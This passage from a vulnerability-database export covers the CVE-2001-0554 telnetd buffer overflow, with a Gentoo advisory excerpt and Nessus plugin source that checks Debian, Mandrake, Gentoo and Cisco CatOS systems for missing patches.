able to run arbitrary code with the privileges of the user running the telnet daemon, usually root. Furthermore, an attacker could make use of an overlong HOME variable to cause a buffer overflow in the telnet client, potentially leading to the local execution of arbitrary code. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll NetKit-telnetd users should upgrade to the latest version: \n \n \n # emerge sync\n \n # emerge -pv \">=net-misc/netkit-telnetd-0.17-r4\"\n # emerge \">=net-misc/netkit-telnetd-0.17-r4\"", "modified": "2004-10-05T00:00:00", "published": "2004-10-05T00:00:00", "id": "GLSA-200410-03", "href": "https://security.gentoo.org/glsa/200410-03", "type": "gentoo", "title": "NetKit-telnetd: buffer overflows in telnet and telnetd", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-01-06T09:44:30", "description": "The netkit-telnet daemon contained in the telnetd package version\n 0.16-4potato1, which is shipped with the 'stable' (2.2, potato)\n distribution of Debian GNU/Linux, is vulnerable to an exploitable\n overflow in its output handling.\n\nThe original bug was found by <scut@nb.in-berlin.de>, and announced to\nbugtraq on Jul 18 2001. At that time, netkit-telnet versions after\n0.14 were not believed to be vulnerable.\n\nOn Aug 10 2001, zen-parse posted an advisory based on the same\nproblem, for all netkit-telnet versions below 0.17.\n\nMore details can be found on\nhttp://online.securityfocus.com/archive/1/203000. 
As Debian uses the\n`telnetd' user to run in.telnetd, this is not a remote root compromise\non Debian systems; however, the user `telnetd' can be compromised.\n\nWe strongly advise you update your telnetd package to the versions\nlisted below.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-070-1 : netkit-telnet - remote exploit", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "p-cpe:/a:debian:debian_linux:netkit-telnet"], "id": "DEBIAN_DSA-070.NASL", "href": "https://www.tenable.com/plugins/nessus/14907", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-070. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14907);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_bugtraq_id(3064);\n script_xref(name:\"DSA\", value:\"070\");\n\n script_name(english:\"Debian DSA-070-1 : netkit-telnet - remote exploit\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The netkit-telnet daemon contained in the telnetd package version\n 0.16-4potato1, which is shipped with the 'stable' (2.2, potato)\n distribution of Debian GNU/Linux, is vulnerable to an exploitable\n overflow in its output handling.\n\nThe original bug was found by <scut@nb.in-berlin.de>, and announced to\nbugtraq on Jul 18 2001. 
At that time, netkit-telnet versions after\n0.14 were not believed to be vulnerable.\n\nOn Aug 10 2001, zen-parse posted an advisory based on the same\nproblem, for all netkit-telnet versions below 0.17.\n\nMore details can be found on\nhttp://online.securityfocus.com/archive/1/203000. As Debian uses the\n`telnetd' user to run in.telnetd, this is not a remote root compromise\non Debian systems; however, the user `telnetd' can be compromised.\n\nWe strongly advise you update your telnetd package to the versions\nlisted below.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://online.securityfocus.com/archive/1/203000\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2001/dsa-070\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected netkit-telnet package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:netkit-telnet\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/07/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"telnet\", reference:\"0.16-4potato.2\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"telnetd\", reference:\"0.16-4potato.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:44:30", "description": "The telnet daemon contained in the netkit-telnet-ssl_0.16.3-1 package\n in the 'stable' (potato) distribution of Debian GNU/Linux is\n vulnerable to an exploitable overflow in its output handling. The\n original bug was found by <scut@nb.in-berlin.de>, and announced to\n bugtraq on Jul 18 2001. At that time, netkit-telnet versions after\n 0.14 were not believed to be vulnerable.\n\nOn Aug 10 2001, zen-parse posted an advisory based on the same\nproblem, for all netkit-telnet versions below 0.17.\n\nMore details can be found on SecurityFocus. 
As Debian uses the\n'telnetd' user to run in.telnetd, this is not a remote root compromise\non Debian systems; the 'telnetd' user can be compromised.\n\nWe strongly advise you update your netkit-telnet-ssl packages to the\nversions listed below.", "edition": 26, "published": "2004-09-29T00:00:00", "title": "Debian DSA-075-1 : netkit-telnet-ssl - remote exploit", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-09-29T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:2.2", "p-cpe:/a:debian:debian_linux:netkit-telnet-ssl"], "id": "DEBIAN_DSA-075.NASL", "href": "https://www.tenable.com/plugins/nessus/14912", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-075. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14912);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_xref(name:\"DSA\", value:\"075\");\n\n script_name(english:\"Debian DSA-075-1 : netkit-telnet-ssl - remote exploit\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The telnet daemon contained in the netkit-telnet-ssl_0.16.3-1 package\n in the 'stable' (potato) distribution of Debian GNU/Linux is\n vulnerable to an exploitable overflow in its output handling. The\n original bug was found by <scut@nb.in-berlin.de>, and announced to\n bugtraq on Jul 18 2001. 
At that time, netkit-telnet versions after\n 0.14 were not believed to be vulnerable.\n\nOn Aug 10 2001, zen-parse posted an advisory based on the same\nproblem, for all netkit-telnet versions below 0.17.\n\nMore details can be found on SecurityFocus. As Debian uses the\n'telnetd' user to run in.telnetd, this is not a remote root compromise\non Debian systems; the 'telnetd' user can be compromised.\n\nWe strongly advise you update your netkit-telnet-ssl packages to the\nversions listed below.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://online.securityfocus.com/archive/1/203000\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2001/dsa-075\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Upgrade the affected netkit-telnet-ssl package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:netkit-telnet-ssl\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:2.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/08/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/09/29\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/07/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 
(!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"2.2\", prefix:\"ssltelnet\", reference:\"0.16.3-1.1\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"telnet-ssl\", reference:\"0.16.3-1.1\")) flag++;\nif (deb_check(release:\"2.2\", prefix:\"telnetd-ssl\", reference:\"0.16.3-1.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T00:51:47", "description": "Some Cisco Catalyst switches, running certain CatOS based software\nreleases, have a vulnerability wherein a buffer overflow in the telnet\noption handling can cause the telnet daemon to crash and result in a\nswitch reload. This vulnerability can be exploited to initiate a \ndenial of service (DoS) attack.\n\nThis vulnerability is documented as Cisco bug ID CSCdw19195.", "edition": 23, "published": "2002-06-05T00:00:00", "title": "Cisco CatOS Telnet Option Handling Overflow (CSCdw19195)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:cisco:ios"], "id": "CSCDW19195.NASL", "href": "https://www.tenable.com/plugins/nessus/10986", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# Script audit and contributions from Carmichael Security\n# Erik Anderson <eanders@carmichaelsecurity.com> (nb: domain no longer exists)\n# Added link to the Bugtraq message archive\n#\n\ninclude(\"compat.inc\");\n\nif(description)\n{\n script_id(10986);\n script_version(\"1.24\");\n script_cve_id(\"CVE-2001-0554\");\n script_bugtraq_id(3064);\n\n script_name(english:\"Cisco CatOS Telnet Option Handling Overflow (CSCdw19195)\");\n\n script_set_attribute(attribute:\"synopsis\", 
value:\n\"The remote device is missing a vendor-supplied security patch.\" );\n script_set_attribute(attribute:\"description\", value:\n\"Some Cisco Catalyst switches, running certain CatOS based software\nreleases, have a vulnerability wherein a buffer overflow in the telnet\noption handling can cause the telnet daemon to crash and result in a\nswitch reload. This vulnerability can be exploited to initiate a \ndenial of service (DoS) attack.\n\nThis vulnerability is documented as Cisco bug ID CSCdw19195.\" );\n script_set_attribute(attribute:\"solution\", value:\n\"http://www.nessus.org/u?c67eaadb\n\nReference : http://online.securityfocus.com/archive/1/252833\" );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value: \"2002/06/05\");\n script_cvs_date(\"Date: 2018/06/27 18:42:25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value: \"2001/07/18\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value: \"cpe:/o:cisco:ios\");\n script_end_attributes();\n\n script_summary(english:\"Uses SNMP to determine if a flaw is present\");\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is (C) 2002-2018 Tenable Network Security, Inc.\");\n script_family(english:\"CISCO\");\n script_dependencie(\"snmp_sysDesc.nasl\", \"snmp_cisco_type.nasl\");\n script_require_keys(\"SNMP/community\", \"SNMP/sysDesc\", \"CISCO/model\");\n exit(0);\n}\n\n# The code starts here\n\nok=0;\nos = get_kb_item(\"SNMP/sysDesc\"); if(!os)exit(0);\nhardware = get_kb_item(\"CISCO/model\"); if(!hardware)exit(0);\n\n\n# Check for the required 
hardware...\n#----------------------------------------------------------------\n# catalyst8500\nif(ereg(string:hardware, pattern:\"^catalyst85[0-9][0-9]$\"))ok=1;\n\n# catalyst4kGateway\nif(ereg(string:hardware, pattern:\"^catalyst4kGateway$\"))ok=1;\n\n# catalyst3[0-9][0-9][0-9][^0-9]*\nif(ereg(string:hardware, pattern:\"^catalyst3[0-9][0-9][0-9][^0-9]*$\"))ok=1;\n\n# catalyst29[0-9][0-9][^0-9]*\nif(ereg(string:hardware, pattern:\"^catalyst29[0-9][0-9][^0-9]*$\"))ok=1;\n\n# catalyst19[0-9][0-9][^0-9]*\nif(ereg(string:hardware, pattern:\"^catalyst19[0-9][0-9][^0-9]*$\"))ok=1;\n\nif(!ok)exit(0);\nok = 0;\n\n\n# Check for the required operating system...\n#----------------------------------------------------------------\n# Is this CatOS ?\nif(!egrep(pattern:\".*Cisco Catalyst Operating System.*\", string:os))exit(0);\n# 4.5\nif(egrep(string:os, pattern:\"(4\\.5\\(([0-9]|1[0-2])\\)|4\\.5),\"))ok=1;\n\n# 5.5\nif(egrep(string:os, pattern:\"(5\\.5\\(([0-9]|1[0-2])\\)|5\\.5),\"))ok=1;\n\n# 6.3\nif(egrep(string:os, pattern:\"(6\\.3\\([0-3]\\)|6\\.3),\"))ok=1;\n\n# 7.1\nif(egrep(string:os, pattern:\"(7\\.1\\([0-1]\\)|7\\.1),\"))ok=1;\n\n\n#----------------------------------------------\n\nif(ok)security_hole(port:161, proto:\"udp\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:16", "description": "A buffer overflow exists in the telnet portion of Kerberos that could\nprovide root access to local users. 
MDKSA-2001:068 provided a similar\nfix to the normal telnet packages, but the Kerberized equivalent was\nnot updated previously.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : krb5 (MDKSA-2001:093)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-07-31T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:krb5-workstation", "p-cpe:/a:mandriva:linux:krb5-server", "p-cpe:/a:mandriva:linux:ftp-server-krb5", "p-cpe:/a:mandriva:linux:krb5-devel", "p-cpe:/a:mandriva:linux:ftp-client-krb5", "cpe:/o:mandrakesoft:mandrake_linux:8.1", "p-cpe:/a:mandriva:linux:telnet-client-krb5", "p-cpe:/a:mandriva:linux:telnet-server-krb5", "p-cpe:/a:mandriva:linux:krb5-libs"], "id": "MANDRAKE_MDKSA-2001-093.NASL", "href": "https://www.tenable.com/plugins/nessus/13906", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2001:093. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13906);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_xref(name:\"MDKSA\", value:\"2001:093\");\n\n script_name(english:\"Mandrake Linux Security Advisory : krb5 (MDKSA-2001:093)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow exists in the telnet portion of Kerberos that could\nprovide root access to local users. 
MDKSA-2001:068 provided a similar\nfix to the normal telnet packages, but the Kerberized equivalent was\nnot updated previously.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:ftp-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:krb5-workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-client-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-server-krb5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif 
(!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"ftp-client-krb5-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"ftp-server-krb5-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"krb5-devel-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"krb5-libs-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"krb5-server-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"krb5-workstation-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"telnet-client-krb5-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK8.1\", cpu:\"i386\", reference:\"telnet-server-krb5-1.2.2-15.1mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:51:52", "description": "The remote host is affected by the vulnerability described in GLSA-200410-03\n(NetKit-telnetd: buffer overflows in telnet and telnetd)\n\n A possible buffer overflow exists in the parsing of option strings by the\n telnet daemon, where proper bounds checking is not applied when writing to\n a buffer. 
Additionally, another possible buffer overflow has been found by\n Josh Martin in the handling of the environment variable HOME.\n \nImpact :\n\n A remote attacker sending a specially crafted options string to the telnet\n daemon could be able to run arbitrary code with the privileges of the user\n running the telnet daemon, usually root. Furthermore, an attacker could\n make use of an overlong HOME variable to cause a buffer overflow in the\n telnet client, potentially leading to the local execution of arbitrary\n code.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2004-10-06T00:00:00", "title": "GLSA-200410-03 : NetKit-telnetd: buffer overflows in telnet and telnetd", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-10-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:netkit-telnetd", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200410-03.NASL", "href": "https://www.tenable.com/plugins/nessus/15424", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200410-03.\n#\n# The advisory text is Copyright (C) 2001-2018 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(15424);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_xref(name:\"GLSA\", value:\"200410-03\");\n\n script_name(english:\"GLSA-200410-03 : NetKit-telnetd: buffer overflows in telnet and telnetd\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200410-03\n(NetKit-telnetd: buffer overflows in telnet and telnetd)\n\n A possible buffer overflow exists in the parsing of option strings by the\n telnet daemon, where proper bounds checking is not applied when writing to\n a buffer. Additionaly, another possible buffer overflow has been found by\n Josh Martin in the handling of the environment variable HOME.\n \nImpact :\n\n A remote attacker sending a specially crafted options string to the telnet\n daemon could be able to run arbitrary code with the privileges of the user\n running the telnet daemon, usually root. 
Furthermore, an attacker could\n make use of an overlong HOME variable to cause a buffer overflow in the\n telnet client, potentially leading to the local execution of arbitrary\n code.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=264846\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=264846\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200410-03\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All NetKit-telnetd users should upgrade to the latest version:\n # emerge sync\n # emerge -pv '>=net-misc/netkit-telnetd-0.17-r4'\n # emerge '>=net-misc/netkit-telnetd-0.17-r4'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:netkit-telnetd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/10/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"net-misc/netkit-telnetd\", unaffected:make_list(\"ge 0.17-r4\"), vulnerable:make_list(\"le 0.17-r3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"NetKit-telnetd\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:15", "description": "A buffer overflow exists in telnet which could provide root access to\nlocal users.", "edition": 24, "published": "2004-07-31T00:00:00", "title": "Mandrake Linux Security Advisory : telnet (MDKSA-2001:068)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2001-0554"], "modified": "2004-07-31T00:00:00", "cpe": ["cpe:/o:mandrakesoft:mandrake_linux:7.2", "p-cpe:/a:mandriva:linux:telnet-server", "cpe:/o:mandrakesoft:mandrake_linux:8.0", "cpe:/o:mandrakesoft:mandrake_linux:7.1", "p-cpe:/a:mandriva:linux:telnet"], "id": "MANDRAKE_MDKSA-2001-068.NASL", "href": "https://www.tenable.com/plugins/nessus/13883", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory 
MDKSA-2001:068. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(13883);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2001-0554\");\n script_xref(name:\"MDKSA\", value:\"2001:068\");\n\n script_name(english:\"Mandrake Linux Security Advisory : telnet (MDKSA-2001:068)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A buffer overflow exists in telnet which could provide root access to\nlocal users.\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected telnet and / or telnet-server packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:telnet-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:8.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2001/08/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/07/31\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 